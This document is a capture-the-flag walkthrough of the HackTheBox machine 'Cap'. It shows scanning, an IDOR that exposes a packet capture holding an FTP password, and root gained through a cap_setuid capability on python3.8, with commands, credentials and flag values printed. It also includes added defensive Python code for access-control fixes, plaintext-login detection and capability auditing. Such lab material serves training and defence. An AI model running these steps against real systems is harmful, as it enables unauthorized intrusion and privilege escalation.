Cap is an easy-rated Linux machine from HackTheBox created by InfoSecJack. In this post, my IP is 10.10.14.59 and the target's IP is 10.129.252.36.
This machine runs an HTTP server hosting a site with downloadable files containing captured, unencrypted traffic. Improper access control over these files results in an Insecure Direct Object Reference (IDOR): just changing a parameter in the URL gives access to another user's capture, with credentials inside. Then, for privilege escalation, there is an exploitable Linux capability.
Gathering Information
First, we are going to check whether the machine is alive, then do the classic reconnaissance to get some general information about the target.
Local Terminal
$ ping 10.129.252.36
Pinging 10.129.252.36 with 32 bytes of data:
Reply from 10.129.252.36: bytes=32 time=488ms TTL=63
Reply from 10.129.252.36: bytes=32 time=149ms TTL=63
Reply from 10.129.252.36: bytes=32 time=150ms TTL=63
Reply from 10.129.252.36: bytes=32 time=159ms TTL=63
Ping statistics for 10.129.252.36:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 149ms, Maximum = 488ms, Average = 236ms
The target machine is up, and from the TTL (63, one hop below the Linux default of 64) we can assume it is a Linux machine.
Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.252.36 -oN Ports
Nmap scan report for 10.129.252.36
Host is up, received echo-reply ttl 63 (0.27s latency).
Scanned at 2023-05-22 15:24:10 Pacific SA Standard Time for 18s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 18.28 seconds
Raw packets sent: 87205 (3.837MB) | Rcvd: 85813 (3.433MB)
Local Terminal
$ nmap -sCV -p 21,22,80 10.129.252.36 -oN WebScan
Nmap scan report for 10.129.252.36
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Mon, 22 May 2023 19:25:10 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
<...>
Ubuntu, and an HTTP service served by gunicorn: information worth saving.
Now that we have the basic information, let's try the generic tests, starting with the FTP port (anonymous login).
Local Terminal
$ ftp 10.129.252.36 # user: anonymous pass:
Connected to 10.129.252.36.
220 (vsFTPd 3.0.3)
Name (10.129.252.36:robertoalfaro): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed # Nothing here for now
Browser: http://10.129.252.36
The Security Snapshot page looks interesting: it takes you to http://10.129.252.36/data/1, where you can download a pcap file to analyze with Wireshark or another tool.
I assume the file should contain information about the FTP server, so that display filter will be applied.
Local Terminal
$ tshark -r 1.pcap "ftp" 2>/dev/null # Nothing useful
51 1.706787 10.129.220.13 → 10.10.14.18 FTP 76 Response: 220 (vsFTPd 3.0.3)
65 1.922434 10.10.14.18 → 10.129.220.13 FTP 66 Request: AUTH TLS
67 1.922631 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
77 2.110156 10.10.14.18 → 10.129.220.13 FTP 62 Request: QUIT
79 2.110307 10.129.220.13 → 10.10.14.18 FTP 70 Response: 221 Goodbye.
87 2.391856 10.10.14.18 → 10.129.220.13 FTP 573 Request: \026\003\001\002\000\001\000\001�\003\003��E�[9��!3�C�+�+��u�2���͔\a\036�I P���9\016\025��O[U\b/XS�]��h��b�4\000\023M��\000�\023\002\023\003\023\001\000\005\000\026\0003\0009\0005\000
89 2.397110 10.129.220.13 → 10.10.14.18 FTP 76 Response: 220 (vsFTPd 3.0.3)
90 2.397233 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
91 2.397316 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
92 2.397361 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
93 2.397403 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
94 2.397445 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
95 2.397487 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
103 2.796944 10.129.220.13 → 10.10.14.18 FTP 76 Response: 220 (vsFTPd 3.0.3)
104 2.828784 10.10.14.18 → 10.129.220.13 FTP 148 Request: \026\003\001\000W\001\000\000S\003\003c�����\002���8�ⴜΖ�m��c\030�(�R;�
106 2.828897 10.129.220.13 → 10.10.14.18 FTP 94 Response: 530 Please login with USER and PASS.
107 2.828921 10.129.220.13 → 10.10.14.18 FTP 132 Response: 530 Please login with USER and PASS.
There is nothing useful here, but this page in particular is giving us a lot: the capture number is just a parameter in the URL and nothing stops us from changing it (the IDOR), so a good option is to request another capture and analyze that file.
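The access-control flaw described above, shown as a small added example in Python. This is not the code of the Cap box's own dashboard (its source is not on the page); it assumes a dict standing in for the capture database and an in-memory list standing in for the application log. The vulnerable handler checks who the user is but not whether the capture belongs to them; the fixed handler adds the ownership check, returns the same "not found" for missing and foreign ids, and records each decision so enumeration of the id space can be spotted.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Capture:
    owner: str
    filename: str


# Constructed sample store (assumption: a dict stands in for the real database).
# The keys are sequential integers, exactly the kind of direct reference that
# the /data/<id> URL on the page exposes.
CAPTURES: Dict[int, Capture] = {
    0: Capture(owner="nathan", filename="0.pcap"),
    1: Capture(owner="guest", filename="1.pcap"),
    2: Capture(owner="nathan", filename="2.pcap"),
}

# Access events as (user, capture_id, allowed); a real app would write these to its log.
AUDIT_LOG: List[Tuple[str, int, bool]] = []


def serve_capture_vulnerable(session_user: str, capture_id: int) -> Optional[str]:
    """The IDOR pattern: authentication happened (we know session_user), but
    authorization is never checked, so any logged-in user can fetch any id."""
    cap = CAPTURES.get(capture_id)
    return cap.filename if cap else None


def serve_capture_fixed(session_user: str, capture_id: int,
                        log: List[Tuple[str, int, bool]] = AUDIT_LOG) -> Optional[str]:
    """Hardened handler: the record must exist AND belong to the requesting user.
    Both failures return None, so the response does not reveal which ids exist.
    `log` defaults to the module-level list on purpose, so all handlers share it."""
    cap = CAPTURES.get(capture_id)
    allowed = cap is not None and cap.owner == session_user
    log.append((session_user, capture_id, allowed))
    return cap.filename if allowed else None


def detect_enumeration(log: List[Tuple[str, int, bool]], threshold: int = 3) -> List[str]:
    """Detection side: a user denied on at least `threshold` distinct ids is
    probably walking the id space. Returns the offending users, sorted."""
    denied: Dict[str, set] = {}
    for user, capture_id, allowed in log:
        if not allowed:
            denied.setdefault(user, set()).add(capture_id)
    return sorted(u for u, ids in denied.items() if len(ids) >= threshold)


if __name__ == "__main__":
    print(serve_capture_vulnerable("guest", 0))  # 0.pcap: guest reads nathan's capture
    print(serve_capture_fixed("guest", 0))       # None: denied and logged
    print(serve_capture_fixed("guest", 1))       # 1.pcap: guest's own file
    for i in range(2, 6):
        serve_capture_fixed("guest", i)
    print(detect_enumeration(AUDIT_LOG))         # ['guest']
```

The ownership check is the actual fix; the uniform `None` and the audit trail are the two things a reviewer would ask for on top of it, because a 403 on some ids and a 404 on others still tells a client which captures exist.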
Local Terminal
$ tshark -r 0.pcap "ftp" 2>/dev/null
34 2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
36 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
38 4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
40 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
42 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
43 5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
45 5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
47 6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
49 6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
50 6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
51 6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
52 6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
54 7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
55 7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
56 7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
57 7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
58 7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
60 28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
61 28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
62 28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
63 28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
64 28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
65 28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
67 31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
68 31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
# If you want to see the information more clearly, you can use:
$ tshark -r 0.pcap -Y "ftp" -Tjson 2>/dev/null #To check the desired field
$ tshark -r 0.pcap -Y "ftp" -Tfields -e tcp.payload 2>/dev/null | xxd -ps -r
And we found credentials in that file, so now we should be able to connect to the FTP server {user: nathan // password: Buck3tH4TF0RM3!}.
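What tshark did above, written out as an added Python example for auditing captures (this is my code for this write-up, not the author's and not part of tshark). It reads a classic pcap with the standard library only, follows each FTP control connection, and reports sessions where a PASS command was sent without a server-accepted AUTH TLS (reply code 234) before it. The secret itself is deliberately not returned: for a defender the finding is "this account logged in over plaintext FTP", not the password. The sample capture is constructed inline with RFC 5737 test addresses and a made-up account, and `tcp_frame`/`build_pcap` are helpers of this example.

```python
import struct
from typing import Dict, Iterator, List, Tuple

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6
FTP_PORT = 21


def iter_tcp_payloads(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    """Walk a classic (non-pcapng) Ethernet capture and yield
    (src_ip, src_port, dst_ip, dst_port, tcp_payload) for every segment with data."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic in (0xA1B2C3D4, 0xA1B23C4D):     # written little-endian (usec / nsec)
        end = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):   # written big-endian
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(end + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (link type 1) captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != PROTO_TCP or len(ip) < total_len or total_len < ihl + 20:
            continue
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (".".join(map(str, ip[12:16])), sport,
                   ".".join(map(str, ip[16:20])), dport, payload)


def find_plaintext_ftp_logins(pcap: bytes) -> List[Dict[str, str]]:
    """One record per FTP control connection whose PASS went over the wire
    unprotected, i.e. with no server-accepted AUTH TLS (code 234) before it."""
    sessions: Dict[Tuple[str, int, str, int], dict] = {}
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        if dport == FTP_PORT:
            key, from_client = (src, sport, dst, dport), True
        elif sport == FTP_PORT:
            key, from_client = (dst, dport, src, sport), False
        else:
            continue
        st = sessions.setdefault(key, {"client": key[0], "server": key[2], "user": "",
                                       "tls": False, "auth_pending": False, "exposed": False})
        for line in payload.decode("ascii", errors="replace").splitlines():
            verb, _, arg = line.strip().partition(" ")
            if from_client:
                verb = verb.upper()
                if verb == "AUTH":
                    st["auth_pending"] = True
                elif verb == "USER":
                    st["user"] = arg
                elif verb == "PASS" and not st["tls"]:
                    st["exposed"] = True    # the secret itself is deliberately not kept
            elif st["auth_pending"]:
                st["tls"] = verb == "234"   # 234 = server agreed to upgrade to TLS
                st["auth_pending"] = False
    return [{"client": s["client"], "server": s["server"], "user": s["user"]}
            for s in sessions.values() if s["exposed"]]


def tcp_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed pcap record: Ethernet + IPv4 + TCP (checksums left zero) + payload."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, PROTO_TCP, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split(".")))) + tcp
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip
    return struct.pack("<IIII", 0, 0, len(eth), len(eth)) + eth


def build_pcap(frames: List[bytes]) -> bytes:
    """Classic little-endian pcap global header (v2.4, Ethernet) followed by the records."""
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1) + b"".join(frames)


# Constructed sample: a client first tries AUTH TLS, the server refuses, then a second
# connection logs in in the clear (same shape as the captures on the page, other values).
C, S = "192.0.2.10", "192.0.2.21"
SAMPLE_PCAP = build_pcap([
    tcp_frame(S, C, 21, 40001, b"220 (vsFTPd 3.0.3)\r\n"),
    tcp_frame(C, S, 40001, 21, b"AUTH TLS\r\n"),
    tcp_frame(S, C, 21, 40001, b"530 Please login with USER and PASS.\r\n"),
    tcp_frame(C, S, 40001, 21, b"QUIT\r\n"),
    tcp_frame(S, C, 21, 40002, b"220 (vsFTPd 3.0.3)\r\n"),
    tcp_frame(C, S, 40002, 21, b"USER alice\r\n"),
    tcp_frame(S, C, 21, 40002, b"331 Please specify the password.\r\n"),
    tcp_frame(C, S, 40002, 21, b"PASS example-secret\r\n"),
    tcp_frame(S, C, 21, 40002, b"230 Login successful.\r\n"),
])

if __name__ == "__main__":
    print(find_plaintext_ftp_logins(SAMPLE_PCAP))
```

Point it at a real file with `find_plaintext_ftp_logins(open("0.pcap", "rb").read())`. On the server side the fix is to stop accepting plaintext logins at all; in vsftpd that is `ssl_enable=YES` together with `force_local_logins_ssl=YES` and `force_local_data_ssl=YES` in vsftpd.conf, after which the AUTH TLS attempt seen in 1.pcap would have been answered with 234 instead of 530.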
Local Terminal
$ ftp 10.129.252.36
Connected to 10.129.252.36.
220 (vsFTPd 3.0.3)
Name (10.129.252.36:robertoalfaro): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
$ ls
229 Entering Extended Passive Mode (|||28192|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 May 22 16:12 user.txt #Just one file
226 Directory send OK.
$ get user.txt
100% |*********************************************************************************************************| 33 20.89 KiB/s 00:00 ETA
226 Transfer complete.
$ exit
Inside the FTP share there was only one file, user.txt. It has the name of the flag, but by its location it looks like a fake one.
Local Terminal
$ cat user.txt
b95a4a7339ef9a54ec29b489b69269d2
My bad, it was the flag... that's nice. So we got the flag without properly exploiting anything.
Privilege Escalation?
Well, we have some credentials; what if we use them for SSH too?
Target Terminal [nathan]
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
nathan@cap:~$ sudo -l
[sudo] password for nathan:
Sorry, user nathan may not run sudo on cap.
nathan@cap:~$ find \-perm -4000 2>/dev/null
# Nothing
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip # Here!!
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
python3.8 has the cap_setuid capability set as effective, so with it we can change our UID to root easily.
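The same `getcap -r /` output, read the way a defender would: an added Python example (my own, not from the page's author or from libcap) that parses getcap lines in both the older `path = caps+flags` layout shown above and the newer `path caps=flags` layout of libcap 2.41+, and flags file capabilities that on their own allow privilege escalation. The severity rules are this example's own assumption: a dangerous capability that is effective (`e`) on an interpreter is critical, because any script run by any local user inherits it; effective on other binaries is high; permitted-only (`p`) is medium, since the program would have to raise it itself. The sample input is the page's output plus one constructed line in the newer format.

```python
import re
from typing import Dict, List, Optional, Tuple

# Capabilities that on their own let a local user become root or bypass file permissions.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}
# Interpreters execute whatever code the caller supplies, so a capability on one of
# them is effectively granted to every local user who can run it.
INTERPRETER = re.compile(r"/(python|perl|ruby|php|lua|node)[0-9.]*$")
# "cap_a,cap_b+eip" (old libcap, after the path and '=') or "cap_a=ep" (libcap >= 2.41).
CAPSET = re.compile(r"^([a-z0-9_,]+)[+=-]([a-z]*)$")


def parse_getcap_line(line: str) -> Optional[Tuple[str, List[str], str]]:
    """Return (path, capability names, flag letters) for one `getcap -r` line,
    or None for lines that are not capability entries (errors, blanks)."""
    parts = line.strip().split(None, 1)
    if len(parts) != 2:
        return None
    path, rest = parts
    m = CAPSET.match(rest.lstrip("= "))
    if not m:
        return None
    return path, m.group(1).split(","), m.group(2)


def audit_getcap(lines: List[str]) -> List[Dict[str, str]]:
    """Keep only entries carrying a dangerous capability and rate each one."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        risky = sorted(c for c in caps if c in DANGEROUS_CAPS)
        if not risky:
            continue
        if "e" not in flags:
            severity = "medium"    # permitted only: the program must raise it itself
        elif INTERPRETER.search(path):
            severity = "critical"  # effective on an interpreter: any script runs with it
        else:
            severity = "high"
        findings.append({"path": path, "caps": ",".join(risky), "severity": severity})
    return findings


# Sample input: the getcap output from the page plus one constructed line in the
# newer libcap format, so the parser is exercised on both layouts.
SAMPLE_GETCAP_OUTPUT = [
    "/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip",
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/traceroute6.iputils = cap_net_raw+ep",
    "/usr/bin/mtr-packet = cap_net_raw+ep",
    "/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep",
    "/opt/tools/perl5.30 cap_dac_read_search=p",  # constructed, not from the box
]

if __name__ == "__main__":
    for finding in audit_getcap(SAMPLE_GETCAP_OUTPUT):
        print(f"{finding['severity']:8} {finding['path']}  ({finding['caps']})")
```

Feed it real output with `audit_getcap(open("getcap.txt").read().splitlines())` after running `getcap -r / 2>/dev/null > getcap.txt` on the host. The remediation for the critical finding on this box is simply `setcap -r /usr/bin/python3.8`, which removes the file's capability set; a service that genuinely needs to bind a low port should get `cap_net_bind_service` on its own binary, not on a shared interpreter.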
Target Terminal [nathan]
nathan@cap:~$ python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("bash")
root@cap:~# cat /root/root.txt
ec8be766a686cb313b6d076df5defb25